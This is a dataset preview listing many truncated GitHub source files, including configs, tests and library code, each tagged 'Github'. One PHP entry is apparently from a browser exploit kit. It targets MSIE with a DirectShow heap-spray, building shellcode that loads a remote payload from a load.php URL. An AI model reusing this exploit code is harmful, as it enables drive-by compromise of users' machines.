text stringlengths 2 99.9k | meta dict |
|---|---|
import { rollToFilter } from '../util'
import { FiltersCreationContext, itemModToFilter } from '../create-stat-filters'
import { propAt20Quality, variablePropAt20Quality, QUALITY_STATS } from './calc-q20'
import { stat } from '@/assets/data'
import { ARMOUR, WEAPON, ItemCategory } from '@/parser/meta'
import { ParsedIt... | {
"pile_set_name": "Github"
} |
#sdf 1.4.32
#tagged-as-never-update
(
startFrame = 1
endFrame = 1
)
def CamCamera "Test1"
{
def MfScope "Leg"
{
# ERROR newline after equal sign for shaped value
double[] aspect =
[ 1.02517, 2]
double width = 1905.41
def MfScope "Thigh" {
double aspect = 1.02... | {
"pile_set_name": "Github"
} |
FRF.16 Frag, seq 693, Flags [Begin], UI e8! IS-IS, length 301989913
L1 LSP, hlen: 27, v: 1, pdu-v: 1, sys-id-len: 6 (0), max-area: 131 (131)
lsp-id: 8383.8383.834f.00-60, seq: 0x06418fcc, lifetime: 33667s
chksum: 0x0900 (unverified), PDU length: 33667, Flags: [ Overload bit set, expense ATT bit set, L1 IS ]
... | {
"pile_set_name": "Github"
} |
# coding=utf-8
from setuptools import setup, Extension
import glob
import os
import re
import sys
if hasattr(sys, 'pypy_version_info'):
ext_modules = []
else:
extra_objects = []
if sys.platform == 'win32':
# This is a hack because msvc9compiler doesn't support asm files
# http://bugs.pyt... | {
"pile_set_name": "Github"
} |
#!/bin/sh
# Run each test and compare
# against known good output
if [ ! -f ../comp1 ]
then echo "Need to build ../comp1 first!"; exit 1
fi
for i in input*
do if [ ! -f "out.$i" ]
then echo "Can't run test on $i, no output file!"
else
echo -n $i
../comp1 $i
cc -o out out.s
./out > trial.$i
... | {
"pile_set_name": "Github"
} |
<?php
class Test
{
public function __construct()
{
}
function test1()
{
}
function test2() {}
private function _test3()
{
}
}
class Test2
{
}
function test2()
{
if ($str{0}) {
$chr = $str{0}; }
if (!class_exists($class_name)) {
echo $error;
... | {
"pile_set_name": "Github"
} |
#pragma once
#include "bit_vector.hpp"
#include "darray.hpp"
#if defined(__clang__)
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wconversion"
#endif
namespace succinct {
class elias_fano {
public:
elias_fano()
: m_size(0)
{}
struct elias_fano_builder ... | {
"pile_set_name": "Github"
} |
//
// NSDate-MJGFormat.h
// MJGFoundation
//
// Created by Matt Galloway on 24/12/2011.
// Copyright (c) 2011 Matt Galloway. All rights reserved.
//
#import <Foundation/Foundation.h>
@interface NSDate (MJGFormat)
+ (NSDate*)dateFromString:(NSString*)string withFormat:(NSString*)format;
- (NSString*)dateStringWit... | {
"pile_set_name": "Github"
} |
{
"name": "LaraWebEdAdmin",
"version": "1.0.0",
"description": "",
"main": "gulpfile.js",
"author": "duyphan.developer@gmail.com",
"license": "MIT",
"dependencies": {
"glob": "^5.0.9",
"gulp": "^3.9.0",
"gulp-autoprefixer": "^2.3.0",
"gulp-compass": "^2.1.0",
"gulp-concat": "^2.6.0",
... | {
"pile_set_name": "Github"
} |
;;; eclim-common-tests.el --- Tests for eclim-common.el -*- lexical-binding: t; -*-
;; This file is not part of GNU Emacs.
;; GNU Emacs is free software: you can redistribute it and/or modify
;; it under the terms of the GNU General Public License as published by
;; the Free Software Foundation, either version 3 of ... | {
"pile_set_name": "Github"
} |
package org.sunger.net.model;
import org.sunger.net.api.ApiClient;
import org.sunger.net.config.AppConstants;
import org.sunger.net.entity.CategoryEntity;
import org.sunger.net.support.okhttp.callback.ResultCallback;
import org.sunger.net.support.okhttp.request.OkHttpRequest;
import java.util.List;
public class Cate... | {
"pile_set_name": "Github"
} |
var compareAscending = require('./_compareAscending');
/**
* Used by `_.orderBy` to compare multiple properties of a value to another
* and stable sort them.
*
* If `orders` is unspecified, all values are sorted in ascending order. Otherwise,
* specify an order of "desc" for descending or "asc" for ascending sort... | {
"pile_set_name": "Github"
} |
<%@ page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" errorPage="" %>
<jsp:useBean id="chStr" scope="page" class="com.tools.ChStr"/>
<jsp:useBean id="conn" scope="page" class="com.tools.ConnDB"/>
<%
String manager=chStr.chStr(request.getParameter("manager"));//此处必须进行编码转换,否则输入中文用户名时将出现... | {
"pile_set_name": "Github"
} |
#-------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under... | {
"pile_set_name": "Github"
} |
static inline unsigned int rgb_to_pixel8(unsigned int r, unsigned int g,
unsigned int b)
{
return ((r >> 5) << 5) | ((g >> 5) << 2) | (b >> 6);
}
static inline unsigned int rgb_to_pixel15(unsigned int r, unsigned int g,
unsigned int... | {
"pile_set_name": "Github"
} |
//
// "$Id: Fl_Object.H 8864 2011-07-19 04:49:30Z greg.ercolano $"
//
// Old Fl_Object header file for the Fast Light Tool Kit (FLTK).
//
// Copyright 1998-2010 by Bill Spitzak and others.
//
// This library is free software. Distribution and use rights are outlined in
// the file "COPYING" which should have been inclu... | {
"pile_set_name": "Github"
} |
// RUN: rm -rf %t
// RUN: %clang_cc1 -objcmt-migrate-literals -objcmt-migrate-subscripting -mt-migrate-directory %t %s -x objective-c -triple x86_64-apple-darwin11
// RUN: c-arcmt-test -mt-migrate-directory %t | arcmt-test -verify-transformed-files %s.result
// RUN: %clang_cc1 -triple x86_64-apple-darwin10 -fsyntax-on... | {
"pile_set_name": "Github"
} |
<?php
/**
* Shopware 5
* Copyright (c) shopware AG
*
* According to our dual licensing model, this program can be used either
* under the terms of the GNU Affero General Public License, version 3,
* or under a proprietary license.
*
* The texts of the GNU Affero General Public License with an additional
* perm... | {
"pile_set_name": "Github"
} |
<?php
if ($UAinfo['browser'] == "MSIE" AND ($UAinfo['platform'] == "XP" OR $UAinfo['platform'] == "2003")){
$expname = "directshow";
$exploits[] = "
function directshow(){
var shellcode = unescape(\"" . ShellCode::get($config['UrlToFolder'] . "load.php?e=4") . "\");
var bigblock = unescape(\"%u9090%u9090\");
... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Type Name="DesignSurfaceCollection" FullName="System.ComponentModel.Design.DesignSurfaceCollection">
<TypeSignature Language="C#" Value="public sealed class DesignSurfaceCollection : System.Collections.ICollection" />
<AssemblyInfo>
<AssemblyName>System.Design</AssemblyNa... | {
"pile_set_name": "Github"
} |
export const setItem = (key, value) => {
if (window.localStorage) {
return window.localStorage.setItem(key, value)
}
}
export const getItem = key => {
if (window.localStorage) {
return window.localStorage.getItem(key)
}
}
export const populateData = data => {
setItem('inProgress', 'true')
const { ... | {
"pile_set_name": "Github"
} |
import weakref
from base64 import urlsafe_b64encode, b64encode
from collections import deque
from datetime import datetime
from gzip import GzipFile
import hashlib
import os
import re
from io import RawIOBase
from jsonfield import JSONField
from corehq.blobs.exceptions import BadName, GzipStreamError
SAFENAME = re.c... | {
"pile_set_name": "Github"
} |
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: [v3,
1/5] mtd: nand: Create a BBT flag to access bad block markers in raw
mode
From: Archit Taneja <architt@codeaurora.org>
X-Patchwork-Id: 6927081
Message-Id: <1438578498-32254-2-git-send-email-architt@codeaurora.org... | {
"pile_set_name": "Github"
} |
/* This is an example of a program which does cavium atomic memory operations
between two processes which share a page. This test is based on :
memcheck/tests/atomic_incs.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
#include <sys/wait.h>
#include "tests/... | {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using MarkdownDeep;
using NUnit.Framework;
using System.Windows.Forms;
namespace MarkdownDeepTests
{
[TestFixture, RequiresSTA]
class JavascriptTests : Form
{
[SetUp]
public void SetUp()
{
}
[Test]
public void test(... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Custom Window Tools - jQuery EasyUI Demo</title>
<link rel="stylesheet" type="text/css" href="../../themes/default/easyui.css">
<link rel="stylesheet" type="text/css" href="../../themes/icon.css">
<link rel="stylesheet" type="text/css" href="../demo.css">... | {
"pile_set_name": "Github"
} |
/****************************************************************************
**
** Copyright (C) 2012 Digia Plc and/or its subsidiary(-ies).
** Contact: http://www.qt-project.org/legal
**
** This file is part of Qt Creator.
**
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this f... | {
"pile_set_name": "Github"
} |
# --- TKO GENERATED --- start
# Do not modify.
#
__tko_karma__: &__tko_karma__
basePath: ''
port: 7777
colors: true
logLevel: INFO
autoWatch: true
browsers:
- PhantomJS
singleRun: false
files:
- spec/helpers/setup.js
- spec/*.js
# - pattern: src/*
# watched: true
# included: ... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{%block title%}Document{% endblock %}</title>
{% block css %}
<link rel="stylesheet" href="{{url_for('static',filename='css/homeOne.css')}}" />
<... | {
"pile_set_name": "Github"
} |
TODO: This document was manually maintained so might be incomplete. The
automation effort is tracked in
https://github.com/kubernetes/test-infra/issues/5843.
Changes in `k8s.io/api` and `k8s.io/apimachinery` are mentioned here
because `k8s.io/client-go` depends on them.
# v10.0.0
**Breaking Changes:**
* Action requ... | {
"pile_set_name": "Github"
} |
#ifndef BOOST_THREAD_PTHREAD_ONCE_HPP
#define BOOST_THREAD_PTHREAD_ONCE_HPP
// once.hpp
//
// (C) Copyright 2007-8 Anthony Williams
// (C) Copyright 2011-2012 Vicente J. Botet Escriba
//
// Distributed under the Boost Software License, Version 1.0. (See
// accompanying file LICENSE_1_0.txt or copy at
//... | {
"pile_set_name": "Github"
} |
-
headers: 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; Avant Browser; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPDTDF; Avant Browser)'
result: { browser: { name: 'Avant Browser', type: browser }, engine: { name: Trident, vers... | {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "photopicker_state_selected@2x.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"... | {
"pile_set_name": "Github"
} |
Finished successfully.
ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
| {
"pile_set_name": "Github"
} |
// @flow
import * as hlc from '../../../packages/hybrid-logical-clock';
import type { HLC } from '../../../packages/hybrid-logical-clock';
import * as crdt from '../../../packages/nested-object-crdt';
import type { Delta, CRDT as Data } from '../../../packages/nested-object-crdt';
import { ItemSchema } from '../shared/... | {
"pile_set_name": "Github"
} |
/* Frank Poth 2020-02-28 */
const GRAPHICS = {
vertex_shader:`#version 300 es
in vec4 a_color;
in vec2 a_translation;
in vec2 a_vertex;
out vec4 v_color;
uniform vec2 u_resolution;
void main() {
vec2 position = ((a_vertex + a_translation) / u_resolution) * 2.0 - 1.0;
position.y = -position.y; // invert t... | {
"pile_set_name": "Github"
} |
{
"name": "Cofense Triage",
"description": "Use the Cofense Triage integration to manage reports and attachments.",
"support": "partner",
"currentVersion": "1.1.5",
"author": "Cofense",
"url": "https://cofense.com/contact-support/",
"email": "support@cofense.com",
"created": "2020-04-14T... | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2015 Etnaviv Project
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published by
* the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY ... | {
"pile_set_name": "Github"
} |
module github.com/hashicorp/errwrap
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Plat... | {
"pile_set_name": "Github"
} |
-- MySQL dump 10.11
--
-- Host: localhost Database: hss_db
-- ------------------------------------------------------
-- Server version 5.0.67-0ubuntu6
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CON... | {
"pile_set_name": "Github"
} |
using System.Text;
using Content.Server.GameObjects.Components.Mobs;
using Content.Server.Mobs.Roles;
using Content.Server.Players;
using Content.Shared.Roles;
using Robust.Server.Interfaces.Console;
using Robust.Server.Interfaces.Player;
using Robust.Shared.IoC;
using Robust.Shared.Network;
using Robust.Shared.Protot... | {
"pile_set_name": "Github"
} |
const notGenericFunction = function() {
return 1 + 1;
};
const genericFunction = function<T>(x: T): T {
return x;
};
| {
"pile_set_name": "Github"
} |
(* Copyright (C) 2009 Mauricio Fernandez <mfp@acm.org> *)
let () = Ocsigen_server.start_server ()
| {
"pile_set_name": "Github"
} |
// Copyright 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef SYNC_INTERNAL_API_PUBLIC_SYNC_MANAGER_FACTORY_H_
#define SYNC_INTERNAL_API_PUBLIC_SYNC_MANAGER_FACTORY_H_
#include <string>
#include "base/memor... | {
"pile_set_name": "Github"
} |
package com.harvic.tryeventbus2;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import com.harvic.other.FirstEvent;
import com.harvic.other.SecondEvent;
import com.ha... | {
"pile_set_name": "Github"
} |
noinst_PROGRAMS = RSA_SecurID_getpasswd
RSA_SecurID_getpasswd_SOURCES = RSA_SecurID_getpasswd.c
RSA_SecurID_getpasswd_CFLAGS = $(PCSC_CFLAGS)
RSA_SecurID_getpasswd_LDADD = $(PCSC_LIBS)
noinst_MANS = RSA_SecurID_getpasswd.1
EXTRA_DIST = $(noinst_MANS)
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="Table Of Contents">
<param name="Local" value="Documentation.html">
</OBJECT>
<... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE article PUBLIC "-//Boost//DTD BoostBook XML V1.0//EN" "http://www.boost.org/tools/boostbook/dtd/boostbook.dtd">
<article id="include-test" last-revision="DEBUG MODE Date: 2000/12/20 12:00:00 $"
xmlns:xi="http://www.w3.org/2001/XInclude">
<title>Include Test</title>
... | {
"pile_set_name": "Github"
} |
require_relative "../rexml_test_utils"
module REXMLTests
class DefaultFormatterTest < Test::Unit::TestCase
def format(node)
formatter = REXML::Formatters::Default.new
output = ""
formatter.write(node, output)
output
end
class InstructionTest < self
def test_content_nil
... | {
"pile_set_name": "Github"
} |
# Growl for nodejs
[](https://travis-ci.org/tj/node-growl)
Growl support for Nodejs. This is essentially a port of my [Ruby Growl Library](http://github.com/visionmedia/growl). Ubuntu/Linux support added thanks to [@niftylettuce](http://github.com/n... | {
"pile_set_name": "Github"
} |
#include "test.h"
#include <ieeefp.h>
/* Test fp getround and fp setround */
void
test_getround (void)
{
newfunc("fpgetround/fpsetround");
line(1);
fpsetround(FP_RN);
test_iok(fpgetround(), FP_RN);
line(2);
fpsetround(FP_RM);
test_iok(fpgetround(), FP_RM);
line(3);
fpsetround(FP_RP);
test_iok... | {
"pile_set_name": "Github"
} |
[DEFAULT]
os.object.bulk-upload.include =
*.txt
subfolder/*.png | {
"pile_set_name": "Github"
} |
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'../../symroot.gypi',
],
'targets': [
{
'target_name': 'prog3',
'type': 'executable',
'sources': [
'prog3.c... | {
"pile_set_name": "Github"
} |
//:
// \file
#include <iostream>
#include <vdgl/vdgl_edgel_chain.h>
#include <vdgl/vdgl_fit_line.h>
#include <vsol/vsol_line_2d.h>
#ifdef _MSC_VER
# include "vcl_msvc_warnings.h"
#endif
#include "testlib/testlib_test.h"
static void test_vdgl()
{
// Create an edgel chain...
vdgl_edgel_chain e;
// ...with some ... | {
"pile_set_name": "Github"
} |
/**
* Copyright 2013-2015, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*
* @providesModule ... | {
"pile_set_name": "Github"
} |
import React from 'react'
import styled from 'styled-components'
const Path = styled.path`
fill: currentColor;
`
export function SvgIconWrapper ({ children, ...rest }) {
return (
<svg
height={24}
preserveAspectRatio='xMinYMax meet'
viewBox='0 0 24 24'
width={24}
{...rest}
>
... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Limitless - Responsive Web Application Kit by Eugene Kopyov</title>
<!-- Global stylesheets -->
<link href="https://font... | {
"pile_set_name": "Github"
} |
/*************************************************************
*
* MathJax/jax/output/HTML-CSS/fonts/Gyre-Pagella/Size3/Regular/Main.js
*
* Copyright (c) 2013-2017 The MathJax Consortium
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance wit... | {
"pile_set_name": "Github"
} |
/*
* Device Tree Source for am3517 SoC
*
* Copyright (C) 2013 Texas Instruments Incorporated - http://www.ti.com/
*
* This file is licensed under the terms of the GNU General Public License
* version 2. This program is licensed "as is" without any warranty of any
* kind, whether express or implied.
*/
#includ... | {
"pile_set_name": "Github"
} |
'use strict';
var callable = require('../../object/valid-callable')
, aFrom = require('../../array/from')
, apply = Function.prototype.apply, call = Function.prototype.call
, callFn = function (arg, fn) { return call.call(fn, this, arg); };
module.exports = function (fn/*, …fnn*/) {
var fns, first;
if (!f... | {
"pile_set_name": "Github"
} |
<h3><a href="http://reference.wolfram.com/search/?q=EmbeddedSymbols">EmbeddedSymbols</a></h3><p><b>Attributes:</b>HoldFirst,
Protected</p><p><b>Symbol has no options.</b></p> | {
"pile_set_name": "Github"
} |
+++
title = "{{ replace .TranslationBaseName "-" " " | title }}"
date = {{ .Date }}
tags = []
featured_image = ""
description = ""
+++
| {
"pile_set_name": "Github"
} |
local _, ns = ...
local B, C, L, DB = unpack(ns)
tinsert(C.defaultThemes, function()
if not NDuiDB["Skins"]["BlizzardSkins"] then return end
if not NDuiDB["Skins"]["Loot"] then return end
LootFramePortraitOverlay:Hide()
hooksecurefunc("LootFrame_UpdateButton", function(index)
local ic = _G["LootButton"..index.... | {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
$LOAD_PATH.unshift(File.expand_path('../../lib', __FILE__))
require 'minitest/autorun'
require 'vcr'
require 'webmock'
require 'fixer'
VCR.configure do |c|
c.cassette_library_dir = 'spec/vcr_cassettes'
c.hook_into :webmock
end
| {
"pile_set_name": "Github"
} |
#------------------------------------------------------------------------------
VERSION = BWS.01
#------------------------------------------------------------------------------
!ifndef ROOT
ROOT = $(MAKEDIR)\..
!endif
#------------------------------------------------------------------------------
MAKE = $(ROOT)\bin\mak... | {
"pile_set_name": "Github"
} |
/*
* Copyright Red Hat Inc. and/or its affiliates and other contributors
* as indicated by the authors tag. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public License vers... | {
"pile_set_name": "Github"
} |
\newcommand{\postertitle}[2]{
\newlength{\cuniw} %
\settowidth{\cuniw}{%
\includegraphics{CUni4.eps}}%
{\setlength{\arraycolsep}{0pt}
\renewcommand{\arraystretch}{1.0}
\setlength{\extrarowheight}{0pt}
#1
{\sf\pmc #2} %
\hfill %\raisebox{-0.65mm}{\epsfig{file=/home/pes20/Posters/col.exstuf/CUni4.eps}}
%
\ma... | {
"pile_set_name": "Github"
} |
{
"compilerOptions": {
"module": "commonjs",
"lib": [
"es6",
"dom"
],
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"strictFunctionTypes": true,
"baseUrl": "../",
"typeRoots": [
"..... | {
"pile_set_name": "Github"
} |
// Copyright (c) ppy Pty Ltd <contact@ppy.sh>. Licensed under the MIT Licence.
// See the LICENCE file in the repository root for full licence text.
using System;
using JetBrains.Annotations;
using osu.Framework.Allocation;
using osu.Framework.Bindables;
using osu.Framework.Extensions;
using osu.Framework.Gra... | {
"pile_set_name": "Github"
} |
//===- LoopExtractor.cpp - Extract each loop into a new function ----------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===-------------------------------------------------------... | {
"pile_set_name": "Github"
} |
CHANGES.rst
LICENSE
MANIFEST.in
README.rst
TESTING.rst
setup.cfg
setup.py
doc/qr.1
qrcode/__init__.py
qrcode/base.py
qrcode/constants.py
qrcode/exceptions.py
qrcode/main.py
qrcode/tests.py
qrcode/util.py
qrcode.egg-info/PKG-INFO
qrcode.egg-info/SOURCES.txt
qrcode.egg-info/dependency_links.txt
qrcode.egg-info/requires.t... | {
"pile_set_name": "Github"
} |
package org.dynjs.runtime;
import org.dynjs.exception.ThrowException;
import org.junit.Test;
public class ContinueStatementTest extends AbstractDynJSTestSupport {
@Test(expected=ThrowException.class)
public void testIllegalContinue() {
eval( "continue;" );
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by app... | {
"pile_set_name": "Github"
} |
################################################################################
# In this test case, we verify if some DDL statements implicitly commit a
# transaction and are written directly to the binary log without going
# through either the Statement- or Transactional-Cache when used with Group
# REPLICATON.
#
# ... | {
"pile_set_name": "Github"
} |
import vtk.vtkActor;
import vtk.vtkNativeLibrary;
import vtk.vtkLineSource;
import vtk.vtkTubeFilter;
import vtk.vtkPolyDataMapper;
import vtk.vtkRenderWindow;
import vtk.vtkRenderWindowInteractor;
import vtk.vtkRenderer;
import vtk.vtkNamedColors;
public class TubeFilter
{
// ------------------------------------... | {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <SAObjects/AceObject.h>
#import <SAObjects/SAAceSerializable-Protocol.h>
@class NSDictionary, NSString;
@interface SAOperation : AceObject <SAAceSerializable>
{
}
+ (id)... | {
"pile_set_name": "Github"
} |
__version__ = "1.0.1"
__author__ = "The MediaCrush developers"
__email__ = "support@mediacru.sh"
| {
"pile_set_name": "Github"
} |
// Copyright 2014-2017 Ulrich Kunitz. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package xlog provides a simple logging package that allows to disable
// certain message categories. It defines a type, Logger, with multiple
// methods ... | {
"pile_set_name": "Github"
} |
---
title: "COR_PRF_FUNCTION Structure"
ms.date: "03/30/2017"
api_name:
- "COR_PRF_FUNCTION"
api_location:
- "mscorwks.dll"
api_type:
- "COM"
f1_keywords:
- "COR_PRF_FUNCTION"
helpviewer_keywords:
- "COR_PRF_FUNCTION structure [.NET Framework profiling]"
ms.assetid: 8bb5acf5-cf4b-4ccb-93f1-46db1f3f8bf3
t... | {
"pile_set_name": "Github"
} |
package epic.parser
package models
/*
Copyright 2012 David Hall
Licensed under the Apache License, Version 2.0 (the "License")
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law o... | {
"pile_set_name": "Github"
} |
// import React from 'react';
// const Node = (props:any) => {
// const { children } = props;
// return <div>{children}</div>;
// };
// export default Node;
| {
"pile_set_name": "Github"
} |
<?php
namespace PhpMigration\Changes\v7dot0;
use PhpMigration\Changes\AbstractRemovedTest;
class RemovedTest extends AbstractRemovedTest
{
}
| {
"pile_set_name": "Github"
} |
;; write.scm - written formatting, the default displayed for non-string/chars
;; Copyright (c) 2006-2019 Alex Shinn. All rights reserved.
;; BSD-style license: http://synthcode.com/license.txt
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;> \section{String utilities}
(define (write-to-s... | {
"pile_set_name": "Github"
} |
/*
* Device model for Cadence UART
*
* Reference: Xilinx Zynq 7000 reference manual
* - http://www.xilinx.com/support/documentation/user_guides/ug585-Zynq-7000-TRM.pdf
* - Chapter 19 UART Controller
* - Appendix B for Register details
*
* Copyright (c) 2010 Xilinx Inc.
* Copyright (c) 2012 Peter A.G. Cro... | {
"pile_set_name": "Github"
} |
/*
* MobiCore driver module.(interface to the secure world SWD)
*
* <-- Copyright Giesecke & Devrient GmbH 2009-2012 -->
* <-- Copyright Trustonic Limited 2013 -->
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* publi... | {
"pile_set_name": "Github"
} |
'''
Common GLES Subset Extraction Script
====================================
In Kivy, our goal is to use OpenGL ES 2.0 (GLES2) for all drawing on all
platforms. The problem is that GLES2 is not a proper subset of any OpenGL
Desktop (GL) version prior to version 4.1.
However, to keep all our dr... | {
"pile_set_name": "Github"
} |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
/*
* test_buildchain_partialchain.c
*
* Test BuildChain function
*
*/
#define debuggingWithoutRevocation
#in... | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more contributor license
* agreements. See the NOTICE file distributed with this work for additional information regarding
* copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the
* "License"); you may not ... | {
"pile_set_name": "Github"
} |
var NativeCustomEvent = global.CustomEvent;
function useNative () {
try {
var p = new NativeCustomEvent('cat', { detail: { foo: 'bar' } });
return 'cat' === p.type && 'bar' === p.detail.foo;
} catch (e) {
}
return false;
}
/**
* Cross-browser `CustomEvent` constructor.
*
* https://developer.mozil... | {
"pile_set_name": "Github"
} |
/*
* Copyright 2011-2018 Branimir Karadzic. All rights reserved.
* License: https://github.com/bkaradzic/bgfx#license-bsd-2-clause
*/
#include "entry_p.h"
#if BX_PLATFORM_EMSCRIPTEN
#include <emscripten.h>
#include <emscripten/html5.h>
extern "C" void entry_emscripten_yield()
{
// emscripten_sleep(0);
}
namespa... | {
"pile_set_name": "Github"
} |
#!/bin/sh
# Run this to generate all the initial makefiles, etc.
echo "Boostrapping StarDict dictionary..."
srcdir=`dirname $0`
test -z "$srcdir" && srcdir=.
PKG_NAME="stardict"
REQUIRED_AUTOMAKE_VERSION=1.9
(test -f $srcdir/configure.ac \
&& test -f $srcdir/ChangeLog \
&& test -d $srcdir/src) || {
echo -n ... | {
"pile_set_name": "Github"
} |
User-agent: *
Allow: / | {
"pile_set_name": "Github"
} |
export default {
uid: '',
name: '',
description: '',
latitude: '',
longitude: '',
farm_type: '',
country: '',
city: '',
reservoirs: []
}
| {
"pile_set_name": "Github"
} |
package tech.tengshe789.miaosha.common.core.annotation;
import tech.tengshe789.miaosha.common.core.validator.IsMobileValidator;
import javax.validation.Constraint;
import java.lang.annotation.*;
/**
* @author tengshe789
*
* 判断手机号码格式的注解
*/
@Target({ElementType.METHOD, ElementType.FIELD, ElementType.ANNOTATION_TY... | {
"pile_set_name": "Github"
} |
// #include<iostream>
#include<fstream>
#include<vector>
using namespace std;
//using namespace __gnu_pbds;
typedef long long ll;
typedef vector<int> vi;
typedef pair<int, int> pi;
//typedef tree<int,null_type,less<int>,rb_tree_tag,tree_order_statistics_node_update> ordered_set;
#define FOR(i, a, b) for... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.4.0/css/font-awesome.min.css">
<link rel="stylesheet" href=".... | {
"pile_set_name": "Github"
} |
{
"CALL_Bounds3_d0g0v0" : {
"blocks" : [
{
"blockHeaderPremine" : {
"difficulty" : "0x020000",
"gasLimit" : "0x7fffffffffffffff",
"timestamp" : "0x03e8",
"updatePoW" : "1"
},
... | {
"pile_set_name": "Github"
} |
/*
* This file is part of Beads. See http://www.beadsproject.net for all information.
*/
package net.beadsproject.beads.ugens;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import net.beadsproject.beads.core.AudioContext;
import net.beadsproject.beads.cor... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?><!--<RelativeLayout
xmlns:android="http://schemas.android.com/apk/res/android"-->
<!-- android:layout_width="match_parent"-->
<!-- android:layout_height="match_parent"-->
<!-- android:orientation="vertical">-->
<LinearLayout xmlns:androi... | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.